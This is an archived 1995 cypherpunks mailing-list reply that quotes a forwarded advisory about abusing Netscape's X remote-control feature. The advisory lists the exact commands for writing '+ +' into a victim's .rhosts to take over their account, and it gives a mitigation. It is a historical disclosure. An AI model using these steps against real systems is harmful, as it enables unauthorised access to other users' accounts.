1995-09-29 - Re: Netscape hole without .Xauthority (fwd)

Header Data

From: sameer <sameer@c2.org>
To: jk@digit.ee (Jyri Kaljundi)
Message Hash: 18b28ecf21807bd8fcf4f2cc7858cf5c8fce0980b9d90b7a6506ae2d30fafcfc
Message ID: <199509291644.JAA07516@infinity.c2.org>
Reply To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
UTC Datetime: 1995-09-29 16:55:35 UTC
Raw Date: Fri, 29 Sep 95 09:55:35 PDT

Raw message

From: sameer <sameer@c2.org>
Date: Fri, 29 Sep 95 09:55:35 PDT
To: jk@digit.ee (Jyri Kaljundi)
Subject: Re: Netscape hole without .Xauthority (fwd)
In-Reply-To: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
Message-ID: <199509291644.JAA07516@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	That's called an X hole, not a netscape hole.

> 
> 
> Haven't seen this on the cypherpunks yet, sorry if this has been here=20
> already.=20
> 
> Juri
> 
> <o       J=FCri Kaljundi          e-mail: jk@digit.ee         o<
>  >o                             tel: +372 6308994            o>
> <o       DigiTurg               http://www.digit.ee/        o<
> 
> ---------- Forwarded message ----------
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.=20
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.
> 
> Let's suppose that you have an account on a target machine, where somebody
> is using Netscape, and either the xhost checking is disabled, or you can
> set the xhost yourself (e.g. if you have an account and the target user has
> no .Xauthority, as is frequent in university computer rooms).
> Then you can gain access to the target user's account using the following
> steps :
> 
> - make a text file containing only "+ +" accessible (as file, as URL, or
>   whatever you like) to the target Netscape client. This is quite easy, eit=
> her
>   if you have a personal WWW page (http://... URL) or an account on the
>   target machine (file://... URL), or even by uploading it to an anon FTP
> 
> - set your DISPLAY environment variable to the target display
> 
> - run the following set of commands :
> 
>   netscape -noraise -remote "openURL(<put-your-URL-here>)"
>   netscape -noraise -remote "saveAs(.rhosts)"
>   netscape -noraise -remote back
> 
> In the second command, the path should be specified whenever possible=20
> (~ is not accepted).
> 
> If the target user does not already have a .rhosts and is not looking at th=
> at
> precise moment, then the chances are it worked !
> 
> Solution to the problem : every user concerned should either create a=20
> Xauthority file, or stop using Netscape.
> 
> =09MXK
> 
> 
> PS: WHY do they bother with PGP and RSA security when they keep such holes =
> ????
> 
> +------------------------------------+---------------------------------+
> |  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
> |  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
> |  75005 PARIS FRANCE                | 75005 PARIS                     |
> |  email: auroux@clipper.ens.fr      | FRANCE                          |
> +------------------------------------+---------------------------------+
> | This .sig is SHAREWARE. If you use it often, please send me $50.     |
> | After registering you will receive a fully functional .sig and all   |
> | updates for free.                                                    |
> +----------------------------------------------------------------------+
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




Thread